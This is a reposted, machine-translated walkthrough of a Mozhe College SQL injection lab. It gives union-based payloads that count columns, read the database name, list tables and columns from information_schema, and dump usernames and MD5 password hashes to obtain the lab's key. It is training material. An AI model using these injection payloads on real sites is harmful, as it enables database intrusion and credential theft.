当前位置:网站首页>Mozi college SQL injection solution
Mozi college SQL injection solution
2020-11-08 09:40:00 【osc_7bgz0no1】
One · Judgment injection
Input id=1, Normal return . Input id=-1 Returns an error . from This shows that there is injection .
Two · Judgment fields
URL id=-1 order by 1
URL id=-1 order by 2
URL id=-1 order by 3
URL id=-1 order by 4
URL id=-1 order by 5 An error at this time , The description has four fields
3、 ... and · Use union Query injection point
Input union select 1,2,3,4
Find out 2,3 For the obvious note point
Four · Use database() Chaku name
Input union select 1,database(),3,4
Find out the name of the library mozhe_Discuz_StormGroup
5、 ... and · Look up the name of the table
Input
union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=‘mozhe_Discuz_StormGroup’
Query to StormGroup_member,notice
See member, So doubt about the first one . So first look up the first .
6、 ... and · Inquire about StormGroup_member The fields stored in the
Input
union select 1,group_concat(column_name)3,4 from information_schema.columns where table_name=‘StormGroup_member’
Query out id,name,password,status
7、 ... and · Query password and user name
union select 1,group_concat(name,0x3a,password),3,4 from StormGroup_member
obtain md5 Encrypted value . To decrypt , Get the code .
If the password is wrong , adopt limit m,n To continue with the inquiry .
8、 ... and · Submit key
After getting the password, you can see key, Copy , Submit .
版权声明
本文为[osc_7bgz0no1]所创,转载请带上原文链接,感谢
边栏推荐
- An error occurred while starting the kernel was successfully resolved
- Can you do it with only six characters?
- laravel8更新之速率限制改进
- 架构师(2020年11月)
- Six key points of data science interview
- The difference between vivoy 73s and glory 30 Youth Edition
- “1024”征文活动结果新鲜出炉!快来看看是否榜上有名?~~
- Cloud alibabab notes come out, the whole network detailed explanation only this one hand is slow
- 进程、线程和协程的区别
- SQL Server 2008R2 18456错误解决方案
猜你喜欢

技术人员该如何接手一个复杂的系统?

More than 50 object detection datasets from different industries

Simple use of future in Scala

将“光头”识别为“足球”,AI 摄像头如何犯的错?

Unparseable date: 'mon Aug 15 11:24:39 CST 2016', time format conversion exception

归纳一些比较好用的函数

413【毕设课设】基于51单片机无线zigbee无线智能家居光照温湿度传输监测系统
![[computer network] learning notes, Part 3: data link layer (Xie Xiren version)](/img/b0/b236a52e38f1cd3eff25a398dac7aa.jpg)
[computer network] learning notes, Part 3: data link layer (Xie Xiren version)

Python learning Day1 -- Basic Learning

Python loop distinction (while loop and for loop)
随机推荐
Face recognition: attack types and anti spoofing techniques
Visual Studio 2015 未响应/已停止工作的问题解决
“1024”征文活动结果新鲜出炉!快来看看是否榜上有名?~~
FORTRAN 77 reads some data from the file and uses the heron iteration formula to solve the problem
归纳一些比较好用的函数
【原创】关于高版本poi autoSizeColumn方法异常的情况
面部识别:攻击类型和反欺骗技术
IQKeyboardManager 源代码看看
Web novice problem of attacking and defending the world
scala 中 Future 的简单使用
来自不同行业领域的50多个对象检测数据集
Python loop distinction (while loop and for loop)
Recommend an economic science video, very valuable!
Littlest jupyterhub| 02 using nbgitpuller to distribute shared files
模板链表类学习
M 端软件产品设计思虑札记 - 知乎
糟糕,系统又被攻击了
微信昵称emoji表情,特殊表情导致列表不显示,导出EXCEL报错等问题解决!
nvm
Tiktok live monitoring Api: random recommendation